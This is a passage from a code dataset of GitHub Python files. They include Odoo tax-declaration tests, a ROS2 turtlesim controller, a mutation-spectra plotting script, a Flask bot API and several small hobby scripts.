l.pop(l.index(i))\n\t\t\t\tprint('删除了:',shan_chu)\n#\t\t\t\tfrom imp import reload\t\n#\t\t\t\treload(get_path)\n\t\t\t\tWf.write_file(l,'w')\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tprint('已放弃操作')\n\t\t\t\tts.tishi('即将返回目录',4)\n\t\t\t\treturn\n\tprint('没有此人')\n\tts.tishi('返回目录',5)\n\t\t\t\t\n\t\n\n\n","repo_name":"ga1008/Student-Information-Management-system-demo-","sub_path":"student_info/shan_chu.py","file_name":"shan_chu.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"73891441998","text":"import pyttsx3\r\nimport speech_recognition as sr\r\nimport regex as re\r\n\r\n#targets a name from voice\r\ndef identify_name(text):\r\n NameError=None\r\n patterns=[\"me llamo([A-Za-z])\", \"mi nombre es([A-Za-z])\", \"^([A-Za-z]+)$\"]\r\n for pattern in patterns:\r\n try:\r\n name=re.findall(patterns, text)[0]\r\n except IndexError:\r\n print(\"No me ha dicho su nombre\")\r\n\r\n return name\r\n\r\n#starts the engine\r\ndef initialize_engine():\r\n engine=pyttsx3.init()\r\n engine.setProperty(\"rate\", 120)\r\n engine.setProperty(\"voice\", \"spanish\") \r\n return engine\r\n\r\n#hearing function and turns it into text\r\ndef recognize_voice(r):\r\n with sr.Microphone() as source:\r\n print(\"Puedes hablar...\")\r\n audio=r.listen(source)\r\n text=r.recognize_google(audio, lenguage=\"es-ES\")\r\n return text\r\n\r\n#main function\r\ndef main():\r\n\r\n initialize_engine()\r\n\r\n engine.say(\"Hola, como te llamas\")\r\n engine.runAndWait()\r\n\r\n r=sr.Recognizer()\r\n text=recognize_voice(r)\r\n name=identify_name(text)\r\n\r\n if name:\r\n engine.say(\"Encantado de conocerte,{}\".format(name))\r\n \r\n else:\r\n engine.say(\"no te entiendo mi loco\")\r\n engine.runAndWait()\r\n \r\n\r\n \r\n \r\n\r\n\r\nif __name__==\"__main__\":\r\n main()","repo_name":"RjCastro0/Python-Portfolio","sub_path":"voice.py","file_name":"voice.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"5505045375","text":"from odoo.tests.common import TransactionCase\nfrom odoo import fields\nfrom odoo.exceptions import UserError, ValidationError\nfrom datetime import datetime, timedelta\nfrom odoo.tools import DEFAULT_SERVER_DATE_FORMAT\n\n\nclass TestDichiarazioneIntento(TransactionCase):\n\n def _create_dichiarazione(self, partner, type_d):\n return self.env['dichiarazione.intento'].create({\n 'partner_id': partner.id,\n 'date': self.today_date.strftime('%Y-%m-%d'),\n 'date_start': self.today_date.strftime('%Y-%m-%d'),\n 'date_end': self.today_date.strftime('%Y-%m-%d'),\n 'taxes_ids': [(6, 0, [self.tax1.id])],\n 'limit_amount': 1000.00,\n 'fiscal_position_id': self.fiscal_position.id,\n 'type': type_d,\n 'telematic_protocol': '08060120341234567-000001',\n })\n\n def _create_invoice(self, partner, tax=False, date=False, in_type=False):\n invoice_date = date if date else self.today_date.strftime('%Y-%m-%d')\n payment_term = self.env.ref('account.account_payment_term_advance')\n invoice_line_data = [(0, 0, {\n 'product_id': self.env.ref('product.product_product_5').id,\n 'quantity': 10.00,\n 'account_id': self.a_cost.id if in_type else self.a_sale.id,\n 'name': 'test line',\n 'price_unit': 90.00,\n 'invoice_line_tax_ids': [(6, 0, [tax.id])] if tax else False,\n })]\n return self.env['account.invoice'].sudo().create({\n 'partner_id': partner.id,\n 'date_invoice': invoice_date,\n 'type': 'in_invoice' if in_type else 'out_invoice',\n 'name': 'Test Invoice for Dichiarazione',\n 'payment_term_id': payment_term.id,\n 'account_id': self.pay_account.id if in_type else self.account.id,\n 'invoice_line_ids': invoice_line_data,\n })\n\n def _create_refund(self, partner, tax=False, date=False, invoice=False):\n invoice_date = date if date else self.today_date.strftime('%Y-%m-%d')\n payment_term = self.env.ref('account.account_payment_term_advance')\n invoice_line_data = [(0, 0, {\n 'quantity': 1.00,\n 'account_id': self.a_sale.id,\n 'name': 'test refund line',\n 'price_unit': 100.00,\n 'invoice_line_tax_ids': [(6, 0, [tax.id])] if tax else False,\n })]\n return self.env['account.invoice'].sudo().create({\n 'partner_id': partner.id,\n 'date_invoice': invoice_date,\n 'type': 'out_refund',\n 'name': 'Test Refund for Dichiarazione',\n 'payment_term_id': payment_term.id,\n 'account_id': self.account.id,\n 'invoice_line_ids': invoice_line_data,\n 'refund_invoice_id': invoice.id,\n })\n\n def setUp(self):\n\n super(TestDichiarazioneIntento, self).setUp()\n self.tax_model = self.env['account.tax']\n self.account = self.env['account.account'].search([\n ('user_type_id', '=', self.env.ref(\n 'account.data_account_type_receivable').id)\n ], limit=1)\n self.pay_account = self.env['account.account'].search([\n ('user_type_id', '=', self.env.ref(\n 'account.data_account_type_payable').id)\n ], limit=1)\n self.a_sale = self.env['account.account'].search([\n ('user_type_id', '=', self.env.ref(\n 'account.data_account_type_revenue').id)\n ], limit=1)\n self.a_cost = self.env['account.account'].search([\n ('user_type_id', '=', self.env.ref(\n 'account.data_account_type_direct_costs').id)\n ], limit=1)\n self.today_date = fields.Date.today()\n self.partner1 = self.env.ref('base.res_partner_2')\n self.partner2 = self.env.ref('base.res_partner_12')\n self.partner3 = self.env.ref('base.res_partner_10')\n self.partner4 = self.env.ref('base.res_partner_4')\n self.tax22 = self.tax_model.create({\n 'name': '22%',\n 'amount': 22,\n })\n self.tax10 = self.tax_model.create({\n 'name': '10%',\n 'amount': 10,\n })\n self.tax2 = self.tax_model.create({\n 'name': '2%',\n 'amount': 2,\n })\n self.tax1 = self.tax_model.create({\n 'name': 'FC INC',\n 'amount': 0,\n 'price_include': True,\n })\n self.fiscal_position = self.env[\n 'account.fiscal.position'].sudo().create({\n 'name': 'Dichiarazione Test',\n 'valid_for_dichiarazione_intento': True,\n 'tax_ids': [(0, 0, {\n 'tax_src_id': self.tax10.id,\n 'tax_dest_id': self.tax1.id,\n })]\n })\n self.fiscal_position_with_wrong_taxes = self.env[\n 'account.fiscal.position'].sudo().create({\n 'name': 'Dichiarazione Test Wrong',\n 'valid_for_dichiarazione_intento': True,\n 'tax_ids': [(0, 0, {\n 'tax_src_id': self.tax10.id,\n 'tax_dest_id': self.tax22.id,\n })]\n })\n self.fiscal_position2 = self.env[\n 'account.fiscal.position'].sudo().create({\n 'name': 'Dichiarazione Test 2',\n 'valid_for_dichiarazione_intento': False,\n 'tax_ids': [(0, 0, {\n 'tax_src_id': self.tax22.id,\n 'tax_dest_id': self.tax10.id,\n })]\n })\n\n self.dichiarazione1 = self._create_dichiarazione(self.partner1, 'out')\n self.dichiarazione2 = self._create_dichiarazione(self.partner2, 'out')\n self.dichiarazione3 = self._create_dichiarazione(self.partner2, 'out')\n self.env['dichiarazione.intento.yearly.limit'].create({\n 'year': self.today_date.year,\n 'limit_amount': 50000.0,\n 'company_id': self.env.user.company_id.id,\n })\n self.dichiarazione4 = self._create_dichiarazione(self.partner4, 'in')\n self.invoice1 = self._create_invoice(self.partner1)\n self.invoice1.journal_id.update_posted = True\n self.invoice2 = self._create_invoice(self.partner1, tax=self.tax1)\n self.invoice3 = self._create_invoice(self.partner1, tax=self.tax1)\n self.invoice_without_valid_taxes = self._create_invoice(\n self.partner1, tax=self.tax2)\n future_date = datetime.today() + timedelta(days=10)\n future_date = future_date.strftime(DEFAULT_SERVER_DATE_FORMAT)\n self.invoice_future = self._create_invoice(self.partner1,\n date=future_date,\n tax=self.tax1)\n self.refund1 = self._create_refund(self.partner1, tax=self.tax1,\n invoice=self.invoice2)\n self.invoice4 = self._create_invoice(self.partner3, tax=self.tax22)\n self.invoice4.fiscal_position_id = self.fiscal_position2.id\n self.invoice5 = self._create_invoice(self.partner4, tax=self.tax1, in_type=True)\n self.other_company = self.env['res.company'].create({\n 'name': 'other',\n })\n self.other_user = self.env['res.users'].create({\n 'name': \"User of other company\",\n 'login': \"other\",\n 'company_ids': [\n (4, self.other_company.id),\n ],\n 'company_id': self.other_company.id,\n })\n\n def test_dichiarazione_data(self):\n self.assertTrue(self.dichiarazione1.number)\n\n def test_costraints(self):\n with self.assertRaises(ValidationError):\n self.dichiarazione1.fiscal_position_id = \\\n self.fiscal_position_with_wrong_taxes.id\n\n def test_get_valid(self):\n dichiarazione_model = self.env['dichiarazione.intento'].sudo()\n self.assertFalse(dichiarazione_model.get_valid())\n records = dichiarazione_model.get_valid(\n type_d='out', partner_id=self.partner1.id, date=self.today_date)\n self.assertEquals(len(records), 1)\n records = dichiarazione_model.get_valid(\n type_d='out', partner_id=self.partner2.id, date=self.today_date)\n self.assertEquals(len(records), 2)\n\n def test_dichiarazione_state_change(self):\n self.assertEqual(self.dichiarazione1.state, 'valid')\n # ----- Close dichiarazione by moving end date before today\n previuos_date = datetime.today() - timedelta(days=10)\n self.dichiarazione1.date_start = previuos_date.strftime(\n DEFAULT_SERVER_DATE_FORMAT)\n self.dichiarazione1.date_end = previuos_date.strftime(\n DEFAULT_SERVER_DATE_FORMAT)\n self.assertEqual(self.dichiarazione1.state, 'expired')\n\n def test_invoice_validation_with_no_effect_on_dichiarazione(self):\n previous_used_amount = self.dichiarazione1.used_amount\n self.invoice1.action_invoice_open()\n post_used_amount = self.dichiarazione1.used_amount\n self.assertEqual(previous_used_amount, post_used_amount)\n self.invoice_future.action_invoice_open()\n post_used_amount = self.dichiarazione1.used_amount\n self.assertEqual(previous_used_amount, post_used_amount)\n self.invoice_without_valid_taxes.action_invoice_open()\n post_used_amount = self.dichiarazione1.used_amount\n self.assertEqual(previous_used_amount, post_used_amount)\n\n def test_invoice_reopen_with_no_effect_on_dichiarazione(self):\n previous_used_amount = self.dichiarazione1.used_amount\n self.invoice1.action_invoice_open()\n self.invoice1.action_invoice_cancel()\n post_used_amount = self.dichiarazione1.used_amount\n self.assertEqual(previous_used_amount, post_used_amount)\n\n def test_invoice_validation_under_dichiarazione_limit(self):\n previous_used_amount = self.dichiarazione1.used_amount\n self.invoice2.action_invoice_open()\n post_used_amount = self.dichiarazione1.used_amount\n self.assertNotEqual(previous_used_amount, post_used_amount)\n\n def test_invoice_validation_over_dichiarazione_limit(self):\n self.invoice2.action_invoice_open()\n with self.assertRaises(UserError):\n self.invoice3.action_invoice_open()\n\n def test_invoice_reopen_with_effect_on_dichiarazione(self):\n previous_used_amount = self.dichiarazione1.used_amount\n self.invoice2.action_invoice_open()\n self.invoice2.action_invoice_cancel()\n post_used_amount = self.dichiarazione1.used_amount\n self.assertEqual(previous_used_amount, post_used_amount)\n\n def test_refund(self):\n self.invoice2.action_invoice_open()\n previous_used_amount = self.dichiarazione1.used_amount\n self.refund1.action_invoice_open()\n post_used_amount = self.dichiarazione1.used_amount\n self.assertNotEqual(previous_used_amount, post_used_amount)\n\n def test_refund_with_amount_bigger_than_residual(self):\n self.invoice2.action_invoice_open()\n self.refund1.invoice_line_ids[0].quantity = 10\n\n # Check that base amount has been updated\n self.assertNotEqual(self.refund1.tax_line_ids[0].base, 1000)\n self.refund1.tax_line_ids._compute_base_amount()\n self.assertEqual(self.refund1.tax_line_ids[0].base, 1000)\n\n # Refund goes over plafond: 100 + 1000 > 1000\n self.assertEqual(self.dichiarazione1.available_amount, 100)\n self.assertEqual(self.refund1.amount_untaxed, 1000)\n self.assertEqual(self.dichiarazione1.limit_amount, 1000)\n with self.assertRaises(UserError):\n self.refund1.action_invoice_open()\n\n def test_fiscal_position_no_dichiarazione(self):\n self.invoice4._onchange_date_invoice()\n self.assertEqual(self.invoice4.fiscal_position_id.id, self.fiscal_position2.id)\n\n def test_invoice_vendor_with_no_effect_on_dichiarazione(self):\n previous_used_amount = self.dichiarazione4.used_amount\n self.assertAlmostEqual(previous_used_amount, 0.0, 2)\n self.invoice5.action_invoice_open()\n post_used_amount = self.dichiarazione4.used_amount\n self.assertAlmostEqual(post_used_amount, 900.0, 2)\n\n def test_copy_dichiarazione_in(self):\n dichiarazione_copy = self.dichiarazione4.copy()\n self.assertTrue(dichiarazione_copy)\n\n def test_multi_company(self):\n \"\"\"Check that a user can only see and create declarations in his company.\"\"\"\n self.env = self.env(user=self.other_user)\n declaration_model = self.env['dichiarazione.intento']\n\n # See only declarations in current company\n self.assertFalse(declaration_model.search_count([]))\n\n # Created declaration is in current company\n declaration = self._create_dichiarazione(self.partner1, 'out')\n self.assertEqual(declaration_model.search([]), declaration)\n self.assertEqual(self.env.user.company_id, declaration.company_id)\n","repo_name":"decodio/oca12","sub_path":"l10n_it_dichiarazione_intento/tests/test_dichiarazione_intento.py","file_name":"test_dichiarazione_intento.py","file_ext":"py","file_size_in_byte":13100,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"39529776683","text":"from core.entity.player import Player\n\n\nclass Team:\n def __init__(self, number: int):\n self.number = number\n self.name = None\n self.color = None\n\n self.players = {\n \"1\": Player(1),\n \"2\": Player(2)\n }\n","repo_name":"zinvapel/kivy-croco-game","sub_path":"core/entity/team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"26891077996","text":"import sys\nfrom collections import defaultdict\n\nsys.setrecursionlimit(10**6)\nn = int(input())\n\ngraph = defaultdict(list)\nfor _ in range(n-1):\n a, b, c = map(int, input().split())\n graph[a].append((b, c))\n graph[b].append((a, c))\n\n\ndef isLeafNode(visited, now):\n isLeafNode = True\n for info in graph[now]:\n nxt, _ = info\n if not visited[nxt]:\n isLeafNode = False\n break\n return isLeafNode\n\nvisited = [False] * (n+1)\nvisited[1] = True\n\ndef findStart(now, total):\n start= (1,0)\n if isLeafNode(visited, now):\n if start[1] < total:\n start = (now, total)\n return start\n\n for info in graph[now]:\n nxt, cost = info\n if visited[nxt]: continue\n visited[nxt] = True\n temp = findStart(nxt, total+cost)\n if start[1] < temp[1]:\n start = temp\n\n\n return start\n\nstart = findStart(1, 0)\n\nvisited = [False] * (n+1)\nvisited[start[0]] = True\ndef DFS(now, total):\n result = 0\n if isLeafNode(visited, now):\n result = max(result, total)\n return result\n\n for info in graph[now]:\n nxt, cost = info\n if visited[nxt]: continue\n visited[nxt] = True\n result = max(result, DFS(nxt, total+cost))\n\n return result\n\nprint(DFS(start[0], 0))\n\n","repo_name":"JunHyxxn/BOJ","sub_path":"DFS_BFS/Quiz_1967_트리의 지름.py","file_name":"Quiz_1967_트리의 지름.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"22327799564","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pylab as plt\nfrom loess.loess_1d import loess_1d\nimport argparse\nimport matplotlib\nimport sys\n\nfrom util import *\n\nplt.rcParams[\"legend.title_fontsize\"] = \"xx-small\"\nmatplotlib.rc(\"xtick\", labelsize=5)\nmatplotlib.rc(\"ytick\", labelsize=5)\nmatplotlib.rc(\"axes\", labelsize=6)\nmatplotlib.rc(\"axes\", titlesize=6)\nmatplotlib.rc(\"legend\", fontsize=6)\n\npops = [\"ALL\", \"AFR\", \"EAS\", \"EUR\", \"SAS\"]\n\nclasses = [\n \"A>C\",\n \"A>G\",\n \"A>T\",\n \"C>A\",\n \"C>G\",\n \"C>T\",\n]\n\nfrom bokeh.palettes import Dark2\nfrom bokeh.palettes import Bright\n\n# D = Dark2[6]\n# colors = [D[1], D[2], D[5], D[4], D[3], D[0]]\ncolors = Bright[6]\n\n\ndef make_parser():\n ADHF = argparse.ArgumentDefaultsHelpFormatter\n parser = argparse.ArgumentParser(\"plot_spectra_history.py\", formatter_class=ADHF)\n optional = parser.add_argument_group(\"Optional\")\n parser.add_argument(\n \"--dataset\",\n \"-d\",\n type=str,\n required=True,\n )\n optional.add_argument(\"--max_age\", \"-m\", default=10000, type=int)\n optional.add_argument(\n \"--singletons\",\n \"-s\",\n action=\"store_true\",\n )\n optional.add_argument(\n \"--frequency\",\n \"-f\",\n type=float,\n default=0.98,\n )\n optional.add_argument(\n \"--num_bins\",\n \"-b\",\n type=int,\n default=100,\n )\n optional.add_argument(\n \"--CI\",\n action=\"store_true\",\n )\n return parser\n\n\ndef get_relative_spectra_histories(\n dataset,\n pop,\n max_age=10000,\n keep_singletons=False,\n max_frequency=0.98,\n num_bins=100,\n CI=False,\n):\n if num_bins != 100:\n assert CI is False\n fname = f\"./data/binned_ages.{dataset}.{pop}.max_age.{max_age}.singletons.{keep_singletons}.max_frequency.{max_frequency}.num_bins.{num_bins}.csv\"\n elif CI is True:\n assert num_bins == 100\n fname = f\"./data/binned_ages.{dataset}.{pop}.max_age.{max_age}.singletons.{keep_singletons}.max_frequency.{max_frequency}.CI.csv\"\n elif num_bins == 100:\n fname = f\"./data/binned_ages.{dataset}.{pop}.max_age.{max_age}.singletons.{keep_singletons}.max_frequency.{max_frequency}.csv\"\n else:\n fname = f\"./data/binned_ages.{dataset}.{pop}.max_age.{max_age}.singletons.{keep_singletons}.max_frequency.{max_frequency}.num_bins.{num_bins}.csv\"\n df = pd.read_csv(fname, sep=\"\\t\")\n y = np.zeros((num_bins, len(classes)))\n for i, c in enumerate(classes):\n y[:, i] = df[c]\n for j in range(len(y)):\n y[j] /= y[j].sum()\n spectra = {}\n for i, c in enumerate(classes):\n spectra[c] = y[:, i]\n bin_mids = np.array((df[\"Min\"] + df[\"Max\"]) / 2)\n return spectra, bin_mids\n\n\ndef get_relative_spectra_histories_extra_classes(\n dataset,\n pop,\n max_age=10000,\n keep_singletons=False,\n max_frequency=0.98,\n num_bins=100,\n CpG=False,\n):\n if num_bins == 100:\n fname = f\"./data/binned_ages.{dataset}.{pop}.max_age.{max_age}.singletons.{keep_singletons}.max_frequency.{max_frequency}.csv\"\n else:\n fname = f\"./data/binned_ages.{dataset}.{pop}.max_age.{max_age}.singletons.{keep_singletons}.max_frequency.{max_frequency}.num_bins.{num_bins}.csv\"\n df = pd.read_csv(fname, sep=\"\\t\")\n additional_classes = [\"ACC>ATC\", \"CCC>CTC\", \"TCC>TTC\", \"TCT>TTT\"]\n if CpG:\n additional_classes.append(\"CpG\")\n classes_all = classes + additional_classes\n y = np.zeros((num_bins, len(classes_all)))\n for i, c in enumerate(classes_all):\n y[:, i] = df[c]\n for j in range(len(y)):\n y[j] /= y[j].sum()\n spectra = {}\n for i, c in enumerate(classes_all):\n spectra[c] = y[:, i]\n bin_mids = np.array((df[\"Min\"] + df[\"Max\"]) / 2)\n return spectra, bin_mids\n\n\ndef plot_spectra(\n dataset,\n max_age,\n keep_singletons,\n max_frequency,\n fout=None,\n show=False,\n CI=False,\n num_bins=100,\n):\n spectra = {}\n bin_mids = {}\n for p in pops:\n spectra[p], bin_mids[p] = get_relative_spectra_histories(\n dataset,\n p,\n max_age=max_age,\n keep_singletons=keep_singletons,\n max_frequency=max_frequency,\n CI=CI,\n num_bins=num_bins,\n )\n anchor = {c: spectra[\"ALL\"][c][0] for c in classes}\n fig = plt.figure(figsize=(8, 5))\n fig.clf()\n for k, p in enumerate(pops):\n ax = plt.subplot(2, 3, k + 1)\n for j, c in enumerate(classes):\n y = (spectra[p][c] - anchor[c]) * 100\n ax.plot(bin_mids[p], y, c=colors[j], lw=0.1, label=None)\n for j, c in enumerate(classes):\n y = (spectra[p][c] - anchor[c]) * 100\n xout, yout, wout = loess_1d(bin_mids[p], y, frac=0.5, degree=2)\n ax.plot(xout, yout, c=colors[j % 6], lw=2.0, label=c)\n ax.set_xscale(\"log\")\n if k == 4:\n ax.legend(ncol=1, fontsize=6, bbox_to_anchor=(1.0, 1.0))\n ax.set_title(p)\n ax.set_ylabel(\"Percent change\")\n ax.set_xlabel(\"Generations ago\")\n\n fig.tight_layout()\n if fout is not None:\n plt.savefig(fout)\n if show:\n plt.show()\n\n\ndef plot_spectra_extra_classes(\n dataset,\n max_age,\n keep_singletons,\n max_frequency,\n fout=None,\n show=False,\n CpG=False,\n):\n spectra = {}\n bin_mids = {}\n for p in pops:\n spectra[p], bin_mids[p] = get_relative_spectra_histories_extra_classes(\n dataset, p, max_age=max_age, keep_singletons=keep_singletons, CpG=CpG\n )\n spectra[p][\"C>T (pulse)\"] = (\n spectra[p][\"ACC>ATC\"]\n + spectra[p][\"CCC>CTC\"]\n + spectra[p][\"TCC>TTC\"]\n + spectra[p][\"TCT>TTT\"]\n )\n for c in [\"ACC>ATC\", \"CCC>CTC\", \"TCC>TTC\", \"TCT>TTT\"]:\n spectra[p].pop(c)\n\n classes_all = classes + [\"C>T (pulse)\"]\n if CpG:\n classes_all.append(\"CpG\")\n\n anchor = {c: spectra[\"ALL\"][c][0] for c in classes_all}\n colors = list(Bright[6]) + [\"black\", \"gray\"]\n fig = plt.figure(figsize=(8, 5))\n fig.clf()\n for k, p in enumerate(pops):\n ax = plt.subplot(2, 3, k + 1)\n for j, c in enumerate(classes_all):\n y = (spectra[p][c] - anchor[c]) * 100\n ax.plot(bin_mids[p], y, c=colors[j], lw=0.1, label=None)\n for j, c in enumerate(classes_all):\n y = (spectra[p][c] - anchor[c]) * 100\n xout, yout, wout = loess_1d(bin_mids[p], y, frac=0.5, degree=2)\n ax.plot(xout, yout, c=colors[j], lw=2.0, label=c)\n ax.set_xscale(\"log\")\n if k == 4:\n ax.legend(ncol=1, fontsize=6, bbox_to_anchor=(1.0, 1.0))\n ax.set_title(p)\n ax.set_ylabel(\"Percent change\")\n ax.set_xlabel(\"Generations ago\")\n\n fig.tight_layout()\n if fout is not None:\n plt.savefig(fout)\n if show:\n plt.show()\n\n\nif __name__ == \"__main__\":\n parser = make_parser()\n args = parser.parse_args(sys.argv[1:])\n (dataset, max_age, keep_singletons, max_frequency, num_bins, CI) = (\n args.dataset,\n args.max_age,\n args.singletons,\n args.frequency,\n args.num_bins,\n args.CI,\n )\n if num_bins != 100:\n assert CI is False\n assert keep_singletons is False\n fname = f\"plots/spectrum_history.{dataset}.max_age.{int(max_age)}.num_bins.{num_bins}.pdf\"\n elif CI:\n assert keep_singletons is False\n fname = f\"plots/spectrum_history.{dataset}.max_age.{int(max_age)}.CI.pdf\"\n elif keep_singletons:\n fname = (\n f\"plots/spectrum_history.{dataset}.max_age.{int(max_age)}.singletons.pdf\"\n )\n elif max_frequency != 0.98:\n fname = f\"plots/spectrum_history.{dataset}.max_age.{int(max_age)}.max_freq.{max_frequency}.pdf\"\n else:\n fname = f\"plots/spectrum_history.{dataset}.max_age.{int(max_age)}.pdf\"\n plot_spectra(\n dataset,\n max_age,\n keep_singletons,\n max_frequency,\n fout=fname,\n show=False,\n CI=CI,\n num_bins=num_bins,\n )\n","repo_name":"apragsdale/dated-mutation-spectra","sub_path":"plot_spectra_history.py","file_name":"plot_spectra_history.py","file_ext":"py","file_size_in_byte":8048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"75115860239","text":"import rclpy\nimport rclpy.node\nimport logging\nimport random\n\nfrom rclpy.node import Node\nfrom rclpy.action import ActionClient\nfrom concurrent.futures import Future\n\nfrom geometry_msgs.msg import Twist\nfrom turtlesim.msg import Pose\nfrom turtlesim.action import RotateAbsolute\n\nimport math\n\nclass TurtlesimController(Node):\n def __init__(self):\n super().__init__('turtlesim_controller')\n\n self.state: str = 'forward'\n\n self.goal_future: Future = None\n\n self.x: float = 0\n self.y: float = 0\n self.theta: float = 0\n self.result_response: float = 0\n self.action_working: bool = False\n\n self.declare_parameter('stop', 'false')\n\n self.timer = self.create_timer(0.5, self.timer_callback)\n self.logger = self.get_logger()\n\n self.publisher = self.create_publisher(Twist, 'turtle1/cmd_vel', 10)\n self.subscriber = self.create_subscription(Pose, 'turtle1/pose', self.pose_listener, 10)\n self.action_client = ActionClient(self, RotateAbsolute, 'turtle1/rotate_absolute')\n\n def send_goal(self, grade):\n goal = RotateAbsolute.Goal()\n goal.theta = math.radians(grade)\n\n self.action_client.wait_for_server()\n\n self.goal_future = self.action_client.send_goal_async(goal, feedback_callback=self.feedback_callback)\n self.goal_future.add_done_callback(self.goal_response)\n\n \n\n def goal_response(self, future):\n goal_handle = future.result()\n if not goal_handle.accepted:\n self.get_logger().info('Goal rejected :(')\n return\n\n self.get_logger().info('Goal accepted :)')\n\n self._get_result_future = goal_handle.get_result_async()\n self._get_result_future.add_done_callback(self.get_result_callback)\n\n def get_result_callback(self, future):\n self.result = future.result().result\n self.get_logger().info('Result: {0}'.format(self.result.delta))\n self.result_response = self.result.delta\n # rclpy.shutdown()\n\n def feedback_callback(self, msg):\n self.feedback = msg.feedback\n self.logger.info(f\"feedback: {self.feedback}\")\n\n def timer_callback(self):\n stop_param = self.get_parameter('stop').get_parameter_value().string_value\n degree: int = random.randint(1, 360)\n\n if (stop_param == 'false'):\n pub_msg = Twist()\n if self.x >= 11 or self.x <= 0 or self.y >= 11 or self.y <= 0:\n self.state = 'backward'\n elif self.state == 'backward':\n self.state = 'rotate'\n else:\n self.state == 'forward'\n\n ################ State Machine #####################\n if self.state == 'backward':\n pub_msg.linear.x = -2.0\n self.publisher.publish(pub_msg)\n self.logger.info(f\"wall: x: {pub_msg}\")\n if self.state == 'forward':\n pub_msg.linear.x = 1.0\n self.publisher.publish(pub_msg)\n self.logger.info(f\"x: {pub_msg}\")\n if self.state == 'rotate':\n if self.result_response == 0 and not self.action_working:\n self.send_goal(degree)\n self.action_working = True\n if abs(self.result_response) > 0:\n self.result_response = 0\n self.action_working = False\n self.state = 'forward'\n \n\n def pose_listener(self, msg):\n self.x = msg.x\n self.y = msg.y\n self.theta = msg.theta\n \n\n\ndef main():\n rclpy.init()\n turtlesim_controller = TurtlesimController()\n rclpy.spin(turtlesim_controller)\n turtlesim_controller.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()","repo_name":"majiddrn/My-ROS2-Projects","sub_path":"src/turtlesim_controller/turtlesim_controller/turtlesim_controller.py","file_name":"turtlesim_controller.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"74047264719","text":"import time\n\nfrom board import Board\nfrom coord import Coord\nfrom piece_bag import PieceBag\nfrom screenable import Screenable\n\n\nclass Game:\n def __init__(self, screen: Screenable):\n self.board = Board(screen)\n self.bag = PieceBag()\n self.loop = True\n self.piece = self.bag.next()\n self.next_piece = self.bag.next()\n\n def start(self):\n while self.loop:\n print(self.bag.next().shapes_coords)\n shape = self.bag.next()\n coords = shape.shapes_coords[shape.shapes_index]\n self.board.paint_coords(coords=coords, initCoord=Coord(0, -2), color=\"#FF0000\")\n self.board.send()\n time.sleep(1)\n\n def draw_skeleton(self):\n self.board.paint_square(Coord(0, 0), Coord(9, 19), \"#\")\n self.board.paint_square(Coord(11, 6), Coord(14, 9), \"#\")\n\n def draw_next_piece(self):\n pass\n\n def stop(self):\n self.loop = False\n\n","repo_name":"ArturAlcoverro/tetris-python","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"19425259978","text":"from functools import lru_cache\n\nimport flask\n\nfrom bot import Bot\n\napp = flask.Flask(__name__)\n\n\n@lru_cache(maxsize=3)\ndef fetch_bot(bot: str):\n return Bot.fetch(bot)\n\n\n@app.route('/clear', methods=['POST'])\ndef clear():\n fetch_bot.cache_clear()\n return 'The cache is cleared.'\n\n\n@app.route('//predict', methods=['POST'])\ndef predict(bot: str):\n try:\n utterance = flask.request.form['utterance']\n app.logger.debug('utterance: ' + utterance)\n if not utterance or len(utterance) == 0:\n raise AttributeError('There is no utterance.')\n\n bot = fetch_bot(bot)\n if not bot.is_trained():\n result = bot.train()\n app.logger.debug(result)\n\n result = bot.predict(utterance)\n return flask.json.jsonify(result)\n except AttributeError as e:\n return flask.make_response(str(e), 404)\n except Exception as e:\n return flask.make_response(str(e), 500)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"fin10/bot_nlu","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"9979564382","text":"import os\nimport sys\nimport numpy as np\n\nfrom keras.models import model_from_json\nfrom keras.preprocessing import image\nfrom keras.preprocessing.image import ImageDataGenerator\n\nimport tensorflow as tf\nimport keras\n\ndef load_model(_dir, prefix='model'):\n desc_file = os.path.join(_dir, \"{}_{}.json\".format(prefix, \"spec\"))\n weights_file = os.path.join(_dir, \"{}_{}.h5\".format(prefix, \"weights\"))\n\n model = None\n with open(desc_file, \"r\") as spec_file:\n model = model_from_json(spec_file.read())\n model.load_weights(weights_file)\n return model\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 4:\n print(\"Usage: run_model.py model_dir model_prefix image_path\")\n sys.exit(1)\n model_dir = sys.argv[1]\n model_prefix = sys.argv[2]\n model = load_model(model_dir, model_prefix)\n model.compile('adam', loss='binary_crossentropy', metrics=['accuracy'])\n\n image_path = sys.argv[3]\n img = image.load_img(image_path, target_size=(64, 64, 3))\n img_array = image.img_to_array(img)\n img_batch = np.expand_dims(img, axis=0)\n\n prediction = model.predict(img_batch / 255)\n print(prediction)\n","repo_name":"spy16/cats-and-dogs","sub_path":"run_model.py","file_name":"run_model.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"31702753625","text":"import gym\nfrom torchvision import transforms\nfrom datasets import ChannelFirst, FrameStack\nimport argparse\nimport torch\nimport numpy as np\nimport 